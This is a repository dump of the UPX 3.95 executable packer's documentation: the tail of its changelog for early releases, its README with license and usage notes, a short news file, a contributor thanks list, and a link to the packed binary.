405 | * dos/com: fixed an internal error that could happen with very small files
406 |
407 | Changes in 0.80 (03 Aug 1999)
408 | * you can set some default options in the environment var 'UPX'
409 | * dos/com: the decompressor stub now checks for enough free memory
410 | * dos/exe: decompressor rewritten, some bugs are fixed
411 | * dos/exe: new option '--no-reloc': no relocation data is put into
412 | the DOS header
413 | * tmt/adam: added support for more stubs, detect already packed files
414 | * tmt/adam: new option '--copy-overlay'
415 | * wc/le: reduced memory requirement during uncompression
416 | * wc/le: support files which do not contain their stack in the last object
417 | * wc/le: fixed a bug which could cause a crash, improved relocation
418 | handling
419 | * wc/le: new option '--copy-overlay'
420 | * win32/pe: '--compress-icons=2' is now the default
421 | * win32/pe: even better TLS support
422 | * win32/pe: versioninfo works on NT
423 | * win32/pe: import by ordinal from kernel32.dll works
424 | * win32/pe: other import improvements: importing a nonexistent DLL
425 | results in a usual Windows message, importing a nonexistent function
426 | results in program exit (instead of crash ;-)
427 | * win32/pe: new option: '--compress-resources=0'
428 | * win32/pe: reduced memory requirement during uncompression, some
429 | files might even require LESS memory when they're compressed
430 | * win32/pe: TYPELIBs should work now
431 | * win32/pe: improved relocation handling, 16-bit relocations should work
432 | * win32/pe: new option '--strip-relocs' (only if you know what you are doing)
433 | * win32/pe: new option '--copy-overlay'
434 | * important internal changes: now the stubs are built at runtime
435 |
436 | Changes in 0.72 (12 May 1999)
437 | * tmt/adam: fixed a serious problem in the decompressor stub; all
438 | compressed tmt files should be recompressed
439 | * win32/pe: fixed the 'shared sections not supported' warning:
440 | read-only shared sections are fine
441 | * win32/pe: never compress TYPELIB resources
442 | * win32/pe: compressed files are hopefully less suspicious to heuristic
443 | virus scanners now
444 | * linux/386: minor decompressor stub updates, nicer progress bar
445 |
446 | Changes in 0.71 (19 Apr 1999)
447 | * dos/exe: added option '--no-overlay'
448 | * linux/386: various improvements in the stub, most notably the
449 | overhead for an extra cleanup process has been removed
450 | * win32/pe: added support for export forwarders
451 | * win32/pe: added support for DLLs without entry point or imports
452 | * win32/pe: yet another .bss fix
453 | * win32/pe: new option '--compress-icons=2': compress all icons
454 | which are not in the first icon directory
455 | * win32/pe: rearranged stub to avoid false alerts from some virus scanners
456 |
457 | Changes in 0.70 (30 Mar 1999)
458 | * added support for linux/386 executables
459 | * improved compression ratio quite a bit
460 | * added new compression level '--best' to squeeze out even some more bytes
461 | * win32/pe: TLS support is much better now
462 | * win32/pe: --compress-icons=0 should now work as well
463 | * the usual minor fixes for win32/pe
464 |
465 | Changes in 0.62 (16 Mar 1999)
466 | * win32/pe: --compress-icons and --compress-exports are on now by default
467 | * win32/pe: --compress-icons should really work now
468 | * win32/pe: fixed a problem with embedded .bss sections
469 |
470 | Changes in 0.61 (08 Mar 1999)
471 | * atari/tos: fixed a problem where the bss segment could become too small
472 |
473 | Changes in 0.60 (06 Mar 1999)
474 | * win32/pe: fixed file corruption when the size of the export data is invalid
475 | * win32/pe: fixed a problem with empty resource data
476 | * win32/pe: compressed file alignment set to minimum value
477 | * win32/pe: made all compressed sections writable
478 | * fixed some other win32/pe bugs
479 | * fixed an address optimization problem for some not Watcom LE files
480 | * fixed a bug which could make UPX hang when an exe header contained
481 | an illegal value
482 | * added some compression flags for the win32/pe format
483 | * added support for Atari ST/TT executables (atari/tos)
484 | * improved compression ratio
485 | * improved compression speed
486 |
487 | Changes in 0.51 (14 Jan 1999)
488 | * fixed a small bug in the PE header that would prevent some compressed
489 | win32/pe executables from running under Windows NT and WINE
490 |
491 | Changes in 0.50 (03 Jan 1999)
492 | * added support for PE format executables (win32/pe & rtm32/pe)
493 | * added support for TMT executables (tmt/adam)
494 | * fixed a dos/sys bug that affected OpenDOS
495 |
496 | Changes in 0.40 (05 Oct 1998)
497 | * improved compression ratio
498 | * fixed a small but fatal bug in dos/sys introduced in 0.30
499 | * fixed a rare bug in dos/exe
500 | * worked around a bug in djgpp's strip 2.8
501 | * djgpp/coff: Allegro packfile support should work now
502 | * added dos/exeh compression method (works on 386+)
503 |
504 | Changes in 0.30 (27 Jul 1998)
505 | * fixed a serious bug in the 32-bit compressors - please don't use
506 | djgpp/coff and watcom/le compressed files from previous versions,
507 | some of them are possibly damaged !
508 | * the 16-bit uncompressors are a little bit shorter & faster
509 | * fixed progress indicator for VESA and SVGA text modes
510 |
511 | Changes in 0.20 (05 Jul 1998)
512 | * second public beta release
513 | * too many changes to list here
514 |
515 | Changes in 0.05 (26 May 1998)
516 | * first public beta release
517 |
518 |
519 | # vim:set syntax=off tw=0 ts=4 sw=4 et: -*- coding: utf-8 -*-
520 |
--------------------------------------------------------------------------------
/upx-3.95-win64/README:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2018 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 |
16 | WELCOME
17 | =======
18 |
19 | Welcome to UPX !
20 |
21 | Please don't forget to read the file LICENSE - UPX is distributed
22 | under the GNU General Public License (GPL) with special exceptions
23 | allowing the distribution of all compressed executables, including
24 | commercial programs.
25 |
26 |
27 | INTRODUCTION
28 | ============
29 |
30 | UPX is an advanced executable file compressor. UPX will typically
31 | reduce the file size of programs and DLLs by around 50%-70%, thus
32 | reducing disk space, network load times, download times and
33 | other distribution and storage costs.
34 |
35 | Programs and libraries compressed by UPX are completely self-contained
36 | and run exactly as before, with no runtime or memory penalty for most
37 | of the supported formats.
38 |
39 | UPX supports a number of different executable formats, including
40 | Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs,
41 | and Linux executables and kernels.
42 |
43 | UPX is free software distributed under the term of the GNU General
44 | Public License. Full source code is available.
45 |
46 | UPX may be distributed and used freely, even with commercial applications.
47 | See the UPX License Agreement for details.
48 |
49 | UPX is rated number one in the well known Archive Comparison Test. Visit
50 | http://compression.ca/ .
51 |
52 | UPX aims to be Commercial Quality Freeware.
53 |
54 |
55 | SHORT DOCUMENTATION
56 | ===================
57 |
58 | 'upx program.exe' will compress a program or DLL. For best compression
59 | results try 'upx --brute program.exe'.
60 |
61 | Please see the file UPX.DOC for the full documentation. The files
62 | NEWS and BUGS also contain various tidbits of information.
63 |
64 |
65 | DISCLAIMER
66 | ==========
67 |
68 | UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.
69 |
70 | Having said that, we think that UPX is quite stable now. Indeed we
71 | have compressed lots of files without any problems. Also, the
72 | current version has undergone several months of beta testing -
73 | actually it's almost 8 years since our first public beta.
74 |
75 | This is the first production quality release, and we plan that future
76 | releases will be backward compatible with this version.
77 |
78 | Please report all problems or suggestions to the authors. Thanks.
79 |
80 |
81 | THE FUTURE
82 | ==========
83 |
84 | - AArch64 (64-bit ARM) for Linux and iOS.
85 |
86 | - The Linux approach could probably get ported to a lot of other Unix
87 | variants, at least for other i386 architectures it shouldn't be too
88 | much work. If someone sends me a fresh hard disk and an official
89 | FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-)
90 |
91 | - We will *NOT* add any sort of protection and/or encryption.
92 | This only gives people a false feeling of security because
93 | by definition all protectors/compressors can be broken.
94 | And don't trust any advertisement of authors of other executable
95 | compressors about this topic - just do a websearch on "unpackers"...
96 |
97 | - Fix all remaining bugs - keep your reports coming ;-)
98 |
99 | - See the file PROJECTS in the source code distribution if you want
100 | to contribute.
101 |
102 |
103 | COPYRIGHT
104 | =========
105 |
106 | Copyright (C) 1996-2018 Markus Franz Xaver Johannes Oberhumer
107 | Copyright (C) 1996-2018 Laszlo Molnar
108 | Copyright (C) 2000-2018 John F. Reiser
109 |
110 | This program may be used freely, and you are welcome to
111 | redistribute it under certain conditions.
112 |
113 | This program is distributed in the hope that it will be useful,
114 | but WITHOUT ANY WARRANTY; without even the implied warranty of
115 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
116 | UPX License Agreement for more details.
117 |
118 | You should have received a copy of the UPX License Agreement along
119 | with this program; see the file LICENSE. If not, visit the UPX home page.
120 |
121 |
122 | Share and enjoy,
123 | Markus & Laszlo & John
124 |
125 |
126 | Markus F.X.J. Oberhumer Laszlo Molnar
127 |
128 |
129 | John F. Reiser
130 |
131 |
132 |
133 | [ The term UPX is a shorthand for the Ultimate Packer for eXecutables
134 | and holds no connection with potential owners of registered trademarks
135 | or other rights. ]
136 |
137 | [ Feel free to contact us if you have commercial compression requirements
138 | or interesting job offers. ]
139 |
140 |
--------------------------------------------------------------------------------
/upx-3.95-win64/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2018 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/upx-3.95-win64/THANKS:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2018 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | .___.. .
16 | | |_ _.._ ;_/ __
17 | | [ )(_][ )| \_)
18 | --------------------
19 |
20 | UPX would not be what it is today without the invaluable help of
21 | everybody who was kind enough to spend time testing it, using it
22 | in applications and reporting bugs.
23 |
24 | The following people made especially gracious contributions of their
25 | time and energy in helping to track down bugs, add new features, and
26 | generally assist in the UPX maintainership process:
27 |
28 | Adam Ierymenko
29 | for severals ideas for the Linux version
30 | Andi Kleen and Jamie Lokier
31 | for the /proc/self/fd/X and other Linux suggestions
32 | Andreas Muegge
33 | for the Win32 GUI
34 | Atli Mar Gudmundsson
35 | for several comments on the win32/pe stub
36 | Charles W. Sandmann
37 | for the idea with the stubless decompressor in djgpp2/coff
38 | Ice
39 | for debugging the PE headersize problem down
40 | Joergen Ibsen and d'b
41 | for the relocation & address optimization ideas
42 | John S. Fine
43 | for the new version of the dos/exe decompressor
44 | Lukundoo
45 | for beta testing
46 | Michael Devore
47 | for initial dos/exe device driver support
48 | Oleg V. Volkov
49 | for various FreeBSD specific informations
50 | The Owl & G-RoM
51 | for the --compress-icons fix
52 | Ralph Roth
53 | for reporting several bugs
54 | Salvador Eduardo Tropea
55 | for beta testing
56 | Stefan Widmann
57 | for the win32/pe TLS callback support
58 | The WINE project (http://www.winehq.com/)
59 | for lots of useful information found in their PE loader sources
60 | Natascha
61 |
62 |
--------------------------------------------------------------------------------
/upx-3.95-win64/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/upx-3.95-win64/upx.exe
--------------------------------------------------------------------------------